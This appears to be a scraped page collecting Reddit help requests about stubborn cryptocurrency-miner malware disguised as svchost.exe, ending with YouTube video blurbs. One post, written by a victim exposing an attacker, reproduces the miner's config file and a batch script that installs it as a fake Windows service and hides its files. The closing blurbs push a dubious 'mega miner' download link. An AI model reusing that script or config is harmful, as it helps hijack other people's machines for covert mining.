Can't remove bitcoin miner and svchost.exe virus ...

Persistent bitcoin miner (svchost.exe)

Howdy folks. Running Windows 7 Pro 64-bit. Noticed I had a rogue svchost.exe process taking up my CPU, killed it and cleared the .exe from the Windows/Temp folder but it kept coming back on a reboot. It appears to be a bitcoin miner.
I've checked my startup processes in msconfig.exe. Didn't see anything obvious and tried disabling the stuff I wasn't sure of, but it keeps coming back.
I read up on older posts in this sub about it and tried doing what they did. Ran numerous scans with Malwarebytes (trial version, do I need to get premium?) and Microsoft Security Essentials. But it keeps. Coming. Back.
For now I'm just killing it every time I boot up, but I need a more permanent solution.
submitted by Oh_sup to techsupport [link] [comments]

MoneroOcean pool owner supports botnets

Hi guys,
As of late my vps that was running Microsoft's RDP got hacked. The attacker ran a malware miner named system.exe that was using 99% CPU. I'm gonna post a screenshot of all of it right here so he gets publicly exposed for his deeds.
https://imgur.com/a/yArkTR8
By further investigation I found that this miner uses config.json as it's configuration file and I'm posting the contents also publicly here:
{ "algo": "cryptonight", "api": { "port": 0, "access-token": null, "id": null, "worker-id": null, "ipv6": false, "restricted": true }, "asm": true, "autosave": true, "av": 0, "background": false, "colors": true, "cpu-affinity": null, "cpu-priority": null, "donate-level": 0, "huge-pages": true, "hw-aes": null, "log-file": null, "max-cpu-usage": 100, "pools": [ { "url": "gulf.moneroocean.stream:80", "user": "44CZd8EvSktM2FzqMVbMBc9pWDcL45yYTWY3VzdymUbjDG6F1734vQh4dj9hjn7tj3eFohS8NGSDSNNVzBxLt7Eb8Vw8vrq", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "variant": -1, "enabled": true, "tls": false, "tls-fingerprint": null } ], "print-time": 60, "retries": 5, "retry-pause": 5, "safe": false, "threads": [ { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true }, { "low_power_mode": 1, "affine_to_cpu": false, "asm": true } ], "user-agent": null, "watch": true }
cmd.bat contents are the following:
attrib -a -s -r -h C:\WINDOWS\Debug\nat* net stop Networks taskkill /f /im system.exe C:\WINDOWS\Debug\nat\svchost.exe install "Networks20181019" C:\WINDOWS\Debug\nat\system.exe sc config "Networks20181019" DisplayName= "Networksr20181019" sc description "Networks20181019" "Microsoft Windows Networks" Set ProcessName=system.exe sc start "Networks20181019" attrib +a +s +r +h C:\WINDOWS\Debug\nat* echo u/off del %USERPROFILE%\Desktop\0.exe
I've scanned everything on VirusTotal and upon visiting the pool I've noticed that the miner has a hefty 50 KH/s. I've also contacted the pool owner via Discord and can post the whole discussion if anyone is willing to see it. He doesn't want to ban the miner, shortly.
I'm not so familiar with Monero but I had Bitcoins and I fully support the mining community. I understand that people with botnets increase difficulty for normal people to make a profit. I've also reported this guy to his ISP by examining the IP found in Event Viewer, since he didn't use a VPN (the IP isn't detected as proxy). I won't post the IP's publicly.
What more can I do? The pool owner also threatened me to report another XMR wallet address to SupportXMR pool because he thought I was a competitive attacker. I can also give that address aswell.
Thank you for reading and stay safe :)
submitted by r00t_of_bnets to Monero [link] [comments]

At my wit's end with virus removal

So I have at least one virus on my computer. The one I know of is some sort of bitcoin miner, I know this because my gpu usage is constantly at 100% and the fan goes crazy as well as hitmanpro categorizing files with names like bitcoinminer.
I have managed to remove every suspicious file I could find and ran antivirus and antimalware until they couldn't detect anything else but the virus keeps coming back.
The main places I think the virus is focused around are the ~C:\Users\Tony\AppData\Local\Temp~ and ~C:\Users\Tony\AppData\Local\WinSXS~ folders.
I have booted into safe mode, deleted everything in the temp folder, and gave myself permission to delete the WinSXS folder. Every time I boot normally the WinSXS folder just comes back. I know something is up with this folder because rkill always terminates it as well as the other antimalware not liking it.
When I normally boot there is a folder in the temp folder with a name that's just random strings of numbers and letters that I can't delete. It says it's open in another program. I searched the folder name is the resource monitor cpu tab and it was associated with svchost.exe and a couple other things. I'm wondering is the virus is somehow tied to svchost.
So here's a rundown of the steps I've been taking (repeatedly) to try to take care of this.
  1. Boot into safe mode (by switching my psu off then on to get to the boot menu)
  2. Show hidden files and folders
  3. Delete everything from the local\temp folder
  4. Delete unknown files from C:\\ProgramData and C:\Users\User\AppData\Roaming
  5. Remove any weird keys from HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  6. Empty Recycle Bin
  7. Run rkill
  8. Run adwcleaner
  9. Run malwarebytes (with rootkit checker)
  10. Run Hitmanpro
  11. Run combofix
  12. Run the trojan remover from https://www.simplysup.com/
  13. Reboot computer normally
  14. Run malwarebytes, watch as it finds the same walwares as a million times before
  15. Listen to my fan speed fluctuate like crazy
  16. Run rkill, it kills a WinSXS process, which does nothing
  17. Cry uncontrollably
So uh, what the hell should I do?
OS: Windows 7
submitted by Froggyfrogger to techsupport [link] [comments]

Bitcoin Miner malware, detected with Malware Bytes but I believe it's still hidden somewhere.

so a few days ago I did something stupid and tried to torrent a game for the first time and ended up installing a Bitcoin Miner onto my PC :/ It was very obvious that it was malware as it quickly seemed to hijack Google Chrome. I scanned with Windows Defender but nothing was found so I checked out the sticky post on here and got a trial of Malware Bytes, which detected the malware and quarantined it, then I removed it. I really thought it was that simple but I think it's still there. I had Spotify playing music on idle and got curious, did CTRL + ALT + DELETE to open up Task Manager and quickly saw my CPU % shoot down from 100% to 2% - %5, which is what it's been sitting at when I'm using it right now.
Other than that, there are a couple of weird things that make me think the virus is still there:
  1. Programs keep getting Suspended status in Task Manager (this is happening to Malware Bytes and Google Chrome), which never used to happen before. This a brand new PC I built in January so it shouldn't be doing this that often. I tried to open Malware Bytes now to scan again and it just froze on "Not Responding" and I can't seem to close it...
  2. There is a strange "Suspended" background process in Task Manager that uses up 3.6MB of memory. Here's a screenshot of what it looks like: http://prntscr.com/lchp1w :(
  3. When I right click ^ "open file location" on the suspended process and the 2 others below it, the location I get is C:\Windows\SysWOW64 and it's titled svchost.exe, which I read is a normal Windows process but there are A LOT of them running in my Task Manager right now
  4. All the other svchost.exes are under C:\Windows\System32, which I read is fine. Does this mean that the one in SysWOW64 is malware/infected?
As per the stickied thread, I ran rkill.com and turned on "scan for rootkits" in my Malware Bytes trial, and also ran the ADWCleaner. I did all of the above after I had originally removed the malware with Malware Bytes, so all these second scans didn't detect anything. Is there anything else I could do to actually detect the malware and remove it?
EDIT: Google Chrome keeps not responding, same with Malware Bytes. Can't uninstall Malware Bytes and Firefox stopped responding too. Writing this on my phone since I turned everything off briefly after writing this post, since my mouse started moving extremely slow and a repetitive beeping sound started coming out of my speakers. I swear it was like whatever infected me detected whenever I looked up information on malware removal and visited this subreddit ...
submitted by rsarector to techsupport [link] [comments]

At full speeds my fans make a lot of noise. Am I the only one? How to fix?

My PC surpasses all the recommended requirements by a large margin, but when I set the full speed (5) it starts making as much noise as an airplane turbine. I have to say that some time ago I suspected having a bitcoin miner on my pc and proceeded to remove it, and sometimes after svchost.exe gave me cpu problems, but it should be fine by now.
submitted by granmaestro01 to hoi4 [link] [comments]

GoogleUpdateService CMD Virus?

Hi, its been more than a year that my PC got infected by some russian adware which everytime opens up some russian website full of scammerous ads in my default browser. It always open up that website exactly after 15 minutes when I boot up the PC, fortunatuly only once per boot season. Now I've finaly got rid of it, mainly because I downloaded some file that was filled with more russian adware, that set some russian site as a home page in all of my browsers, then probably a bitcoin miner I recon, because after that svchost.exe was using 50% of my CPU the whole time.
So I installed good ol Malwarebytes, ran full scan, found malwares and bunch of infected files and registries, quarantined em all and finaly no annoying russian pop ups and bitcoin miner.
However after a while when I boot up, a CMD window pops up in the background, which contain some lines, sayin its GoogleUpdateService and downloadin some stuff and after when its finished with downloading, Malwarebytes quarantines it.
Is it really the Google Update Service, which by weird coincidence started to pop up, after I finaly cleaned my PC with Malwarebytes, or is it as I recon some remaining rusky virus?
Malwarebytes quarantines the following two files after that:
Adware.File.Tour - C:\Users\Exelzior\AppData\Local\Temp\GoogleUpdate_203093539.exe Riskware.Tool.CK - C:\Windows\KMSEmulator.exe
submitted by MrExelzior to techsupport [link] [comments]

Disk Usage Always at 100% - Suspect that it is a Bitcoin Miner

Alright, so for a few months now I've had an issue with my hard drive that has led to me being constantly annoyed. At first, it seemed as if the disk usage was sporadically jumping up to 100% and I dismissed it as simply having bought a shitty hard drive and considered buying another. However, as time passed I began to notice that the extremely elevated levels of disk usage were occurring when the computer had been idle for a few minutes. Whenever I came back and moved my mouse around a good bit or opened task manager, the disk usage would almost instantaneously drop to quieter, normal levels (0-10% as compared to 100%). I went through an extreme amount of work and searching, having used a huge amount of antivirus programs in hopes of destroying this little nuisance. It irks me to no end because the hard drive become extremely loud after leaving the computer for a few minutes. It's distracting and it doesn't help that every once in a while whenever I come back, the computer is super slow. I have FRST logs if anyone needs them to diagnose the problem. I also noticed that others have had issues with Bitcoin miners and I have tested methods posted by those who have resolved issues with miners. On top of that, I have gone through a large amount of the Windows 10 fixes that are meant to fix problems caused by Windows 10 that could bring about disk usage problems. Also, I have noticed that the two processes that seem to elevate the disk usage the most are System (ntoskrnl.exe) and Service Host (svchost.exe). I have opened the file location of the svshost.exe to make sure it is not some phony that is in my browser's Temp folder, but it seems to be the legit thing in the System32 folder causing this issue. Also, I have no clue if this is a symptom of the potential Bitcoin miner, but whenever I open the Start Menu after some time of not having opened it, my disk usage rises to absurd levels. I have also turned off indexing in the hopes that this would alleviate some of the issues, but it has not fixed anything. On top of all this, whenever I open a new program the disk usage flies up to 90+%, and I have no clue as to whether this is normal or if it is an issue caused by malware. Anyhow, I think that's all and please save me from this hard drive hell if possible!
 
Windows Edition: Windows 10 Home
Version: 1703
OS Build: 15063.608
 
Hard Drive: https://i.imgur.com/95gHqdS.png - Crystal Disk Info
https://www.amazon.com/Hitachi-Ultrastar-HUA722020ALA331-Enterprise-Refurbished/dp/B01CM85C0K - Link to Amazon Page of HDD
 
I am using these Antivirus programs along with some others: https://i.imgur.com/qDnpdky.png
submitted by lemote to techsupport [link] [comments]

[BitCoin Miner Virus] Need assistance in it's removal.

Hi All,
I am a fully qualified Support Tech and have managed to download myself a BitCoin Miner Virus (or what I believe to be) on my Personal/Gaming computer.
How: Torrented FIFA 15, Installed It, Issues Ensued.
What: There are 2 processes that start up on boot, they are disguised as system processes:
svchost.exe
lsass.exe
They are located in the C:\Windows\Temp folder. I can kill the processes without issue and remove the .exe files, but they return on boot.
What Do They Do:
svchost.exe = runs CPU at 75%
lsass.exe = run GPU at 100%
I disconnected the internet to see if it was a BitCoin miner but they stayed @ 100%. Possibly disguising what they actually are.
What Have I Done So Far Result
Killed Processes, Deleted .EXE Processes die without issue and .EXE's delete immediately, but they return on Reboot.
Ran Malwarebytes... twice Located the problem .EXE files and removed them, also located some more versions located in IExplore/Temp directory and deleted but issue is persistant
Found and Removed Suspect Registry Entries There werent many but I search for SVCHOST and LSASS and located afew registry entries attached to FIFA15 installation keys and removed them
Followed Steps on this Reddit Entry: http://bit.ly/1GNgUaZ Shortened URL for Formatting Purposes But the processes and .EXE files dont match and the registry key isn't found in the suggested location
Help me Obi-Wan Kenobi.... You're my only hope.
submitted by hackthefortress to techsupport [link] [comments]

svchost.exe taking up 90%+ of CPU

Recently I started to notice that a weird clone of svchost.exe has been taking up a ridiculous amount of CPU on my computer. It's not tied to any services, and when I check the process location it directs me to a temp folder.
So far I've tried Malwarebytes, Spybot S&D, and Microsoft Security Essentials but nothing is getting rid of it. I assume someone snuck a bitcoin miner in with something I downloaded. Any idea on how I might go about being rid of this?
submitted by FloppyDingo24 to computerviruses [link] [comments]

Need assistance removing the most pesky malware I've ever come across.

System specs:
(genuine)Windows 8.1
i5 3570K
8 GB RAM
GTX 760
No overclocking.
Upon starting my computer, this always happens:
Gee. I wonder who the culprit is
More info on this little shit
The file is svchost.exe and is located in the Windows/temp folder. This is obviously the malware. So I run a scan with Malwarebytes and it detects it as a bitcoin miner. I property delete it and it's all fine. But if I turn off my computer completely, it will come back in the same place. This virus causes my computer to be laggy and unusable for gaming.
I've tried Adwcleaner, Windows Defender, and Rkill. Same results on them all.
I downloaded hijackthis but I don't know how to use it. Any help on this would be awesome.
submitted by BearOnDrums to techsupport [link] [comments]

New svchost.exe process each day that takes exactly 13% CPU at a constant.

Basically each day when i power on my PC, I check the processes list for CPU-usage, and I always see a svchost.exe process using exactly 13% of my CPU. 3 days ago the svchost.exe's service was BITS (Background Intelligent Transfer Service), yesterday it was AELookupSvc (Application Experience) and today it's Browser (Computer Browser).
Is it not weird that different types of services use exactly the same amount of CPU, and roughly the same amount of RAM (0,15-17 gigs). It is also the ONLY svchost.exe that takes over "00" CPU%.
So I'm new to this type of issue. I've dealt with malware before, but could this be a bitcoin miner, or something of that sort?
submitted by pl99z to techsupport [link] [comments]

How to diagnose and remove a bitcoin miner trojan - YouTube TheBitcoinMiner - YouTube bitcoin miner exe Bitcoin Mega Miner 3 0 Public Version Demo - YouTube Bitcoin Miner Malware  Incredibly Stealthy! - YouTube

Hello everyone,As the title says, i have a little problem with svchost.exe (which could also be the bitcoin miner). Kaspersky found something in C:\Windows\temp\svchost.exe around one month ago. I tried to fix it but it came back after every restart. As it did nothing to my pc and as it was calle... I've been trying for weeks to remove an svchost.exe virus which appears to be bitcoin mining using my GPU, I first noticed when my GPU load was at 98% load when idle and realised that if I just ended the svchost.exe in processes it would stop until I restarted my PC, however I need rid of this but I've tried everything I could find. svchost.exe bitcoin miner - posted in Virus, Trojan, Spyware, and Malware Removal Help: Hello everyone, As the title says, i have a little problem with svchost.exe (which could also be the bitcoin ... BitCoinMiner How to Remove BitCoinMiner from Your Computer. To completely purge BitCoinMiner from your computer, you need to delete the files, folders, Windows registry keys and registry values associated with BitCoinMiner. The svchost.exe *32 miner is also the type of malware whose primary purpose is to generate cryptocurrency tokens from some of the cryptocurrencies that are anonymous, such as Monero or BitCoin and even ZCash. If you see the svchost.exe *32 miner running active on your computer, we advise you to learn how to remove it from your PC completely without damaging Windows, preferably by using the ...

[index] [46927] [42199] [23485] [40416] [22884] [45392] [33005] [32021] [43130] [4953]

How to diagnose and remove a bitcoin miner trojan - YouTube

Bitcoin Miners can tax your CPU and use up your system resources without you even knowing. When you open task manger to investigate, the malware process stea... bitcoin miner exe MLM leaders. Loading... Unsubscribe from MLM leaders? ... Inside a Bitcoin mine that earns $70K a day - Duration: 5:09. Digital Trends Recommended for you. 5:09 . Top 5 Weird WW2 ... How to Fix (svchost.exe) High CPU Usage in Windows 10 SVCHOST.EXE is one of those mysterious processes that constantly runs in Windows and is utterly essenti... Bitcoin Mega Mining 3.0 Public Version Demo (Portable Version, no need to install) Download Here: https://www.mediafire.com/?1nhcd2rzrbbpgqe Alternative link... Bitcoin the cryptocurrency and anything that has to do with mining it or using it.

#